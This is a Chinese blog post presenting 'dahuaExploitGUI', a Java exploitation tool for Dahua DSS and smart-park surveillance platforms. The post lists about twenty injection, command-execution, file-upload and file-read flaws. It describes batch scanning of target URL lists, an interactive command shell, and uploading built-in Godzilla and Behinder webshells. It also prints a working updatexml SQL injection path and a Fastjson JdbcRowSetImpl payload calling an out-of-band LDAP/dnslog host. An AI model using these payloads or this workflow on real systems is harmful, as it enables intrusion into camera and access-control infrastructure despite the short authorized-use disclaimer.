首页 渗透工具 正文
  • 本文约3898字,阅读需19分钟
  • 384
  • 0

dahua综合漏洞利用工具

没事写个工具,程序采用java开发,环境JDK 1.8 声明:仅用于授权测试,用户滥用造成的一切后果和作者无关 请遵守法律法规!

https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

dahua综合漏洞利用工具 收录漏洞如下:

大华DSS数字监控系统attachment_clearTempFile.action注入漏洞

大华DSS数字监控系统远程命令执行漏洞

大华DSS数字监控系统itcBulletin注入漏洞

大华智慧园区综合管理平台信息泄露漏洞

大华智慧园区综合管理平台getNewStaypointDetailQuery注入漏洞

大华智慧园区综合管理平台clientserver注入

大华DSS user_edit.action信息泄露漏洞

大华智慧园区综合管理平台poi任意文件上传漏洞

大华智慧园区综合管理平台video任意文件上传漏洞

大华智慧园区综合管理平台emap任意文件上传漏洞

大华智慧园区综合管理平台searchJson注入漏洞

大华DSS数字监控系统attachment_getAttList.action注入漏洞

大华智能物联综合管理平台justForTest用户登录漏洞

大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞

大华智慧园区综合管理平台deleteFtp远程命令执行漏洞

大华EIMS-capture_handle远程命令执行漏洞

大华智能物联综合管理平台random远程命令执行漏洞

大华智慧园区综合管理平台ipms命令执行漏洞

大华智能物联综合管理平台env信息泄露漏洞

大华ICC智能物联综合管理平台readpic任意文件读取漏洞

大华DSS数字监控系统任意文件读取漏洞

功能介绍

一键检测模块,选择模块

批量检测模块: 模块如下:

大华DSS数字监控系统远程命令执行漏洞

大华智慧园区综合管理平台信息泄露漏洞

大华智能物联综合管理平台justForTest用户登录漏洞

大华DSS数字监控系统attachment_clearTempFile.action注入漏洞

大华DSS数字监控系统itcBulletin注入漏洞

大华智慧园区综合管理平台clientserver注入

大华智慧园区综合管理平台searchJson注入漏洞

大华智慧园区综合管理平台poi任意文件上传漏洞

大华智慧园区综合管理平台video任意文件上传漏洞

大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞

大华智慧园区综合管理平台deleteFtp远程命令执行漏洞

大华EIMS-capture_handle远程命令执行漏洞

大华智能物联综合管理平台random远程命令执行漏洞

大华智慧园区综合管理平台ipms命令执行漏洞

CMDshell模块 大华DSS数字监控系统远程命令执行漏洞

大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞

大华智慧园区综合管理平台deleteFtp远程命令执行漏洞

大华智慧园区综合管理平台ipms命令执行漏洞

根据程序版本优化,添加新版本的Poc

webshell利用模块

大华智慧园区综合管理平台poi任意文件上传漏洞

大华智慧园区综合管理平台video任意文件上传漏洞

大华智慧园区综合管理平台emap任意文件上传漏洞

功能使用

默认模块可一键扫描所有漏洞

image

image

image

image

选择模块可单独选择你要检测的模块,输入目标,点击选择模块即可检测漏洞 ,批量检测内置路径:/url.txt 文本放入你要检测的网站列表 默认检测,为了防止网络阻塞

image

注:默认检测只检测大华DSS数字监控系统远程命令执行漏洞 下载dahuaExploitGUI程序,当前目录新建文本,命名为url.txt,文本放入你要检测的网站列表,选择批量检测模块,即可开始检测

cmdshell模块

image

选择模块进行漏洞验证,如果存在,在cmdshell输入你要执行的命令即可

webshell利用模块:

image

内置Godzilla Behinder jspcmdshell 三种类型的shell 一个测试文件

具体使用方法:选择模块进行验证 如video漏洞存在 可选择内置类型,如测试文件 点击video getshell上传即可 如果存在video漏洞 可选择内置shell, 点击video getshell上传即可

如存在emap上传漏洞,可上传测试

image

image

编写小记

踩坑之处,判断注入的精准技巧 大华智慧园区综合管理平台searchJson注入漏洞 默认payload: portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D 判断PAYLOAD: 使用md5(123456) portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1)--%22%7D/extend/%7B%7D 得到结果 e10adc3949ba59abbe56e057f20f883 是SOAP的XML数据发送

坑点:由于页面是错误500异常,一访问就进行了try捕获异常 如果你在判断外进行获取数据,是不行的

错误写法: 程序执行结束 while ((lines = errorReader.readLine()) != null) { errorResponse.append(lines); }

           if (errorResponse.toString().contains("e10adc3949ba59abbe56e057f20f883")) {

判断初始化的500页面 正常写法,判断内执行: if (responseCode == 500) { while ((lines = errorReader.readLine()) != null) { errorResponse.append(lines); }

            //   test1.appendText(errorResponse.toString());

            if (errorResponse.toString().contains("e10adc3949ba59abbe56e057f20f883")) {

关于ceye漏洞判断精准的问题 ipms漏洞 默认payload: {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://" + randomNumber + "." + ml.getText() + "", "autoCommit": true} 这里还是做了一个随机生成 ml.setText(randomNumber + "." + ml.getText()); String a; a = ml.getText();

            然后通过
             if (response.toString().contains(ml.getText())) {

进行判断回显 可能网络会造成卡顿,因为调用了两个方法 稳妥的做法: test1.appendText("\n" + "随机为:" + a + "请人工检查" + "\n"); 这个a就是随机生成后的如xxx.902323.dnslog.cn

版本更新日志

dahuaExploitGUI v2.3版

增加了大华智能物联综合管理平台env模块检测

增加了大华ICC智能物联综合管理平台readpic任意文件读取模块检测

增加了大华DSS数字监控系统任意文件读取模块检测

批量检测模块,默认只输出存在漏洞的网站

dahuaExploitGUI v2.1版

增加了大华智慧园区综合管理平台sendFaceInfo模块检测

增加了大华智慧园区综合管理平台deleteFtp模块检测

增加了大华EIMS-capture_handle模块检测

增加了大华智能物联综合管理平台random模块检测

增加了大华智慧园区综合管理平台ipms模块检测

dahuaExploitGUI v2.2版

该版本中优化了一键检测

大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞

大华智慧园区综合管理平台deleteFtp远程命令执行漏洞

大华EIMS-capture_handle远程命令执行漏洞

大华智能物联综合管理平台random远程命令执行漏洞

大华智慧园区综合管理平台ipms命令执行漏洞

以上漏洞模块检测被加入选择模块中,不再加入到一键模块中

优化了自定义上传模块

用户可根据选择漏洞模块,进行上传测试

如存在video漏洞,选择自定义video,输入你要的shell代码,输入文件名即可

poi上传漏洞优化,程序会将用户输入的shell代码自动转换成base64加密进行上传

批量检测优化了线程执行,这样能缓解线程阻塞的问题

加入开始线程,和结束线程

具体使用方法:

url.txt放入你要批量检测的网站列表 选择模块进行检测

比如你当前检测的是 大华智能物联综合管理平台justForTest用户登录漏洞

你想换成 大华智慧园区综合管理平台clientserver注入 你点击结束线程

这样就结束了大华智能物联综合管理平台justForTest用户登录漏洞的Thread线程

你再点击开始线程,又会启动一个新的线程

选择大华智慧园区综合管理平台clientserver注入检测即可

温馨提示:本文最后更新于2024年7月23日 05:38,若内容或图片失效,请在下方留言或联系博主。
评论
博主关闭了评论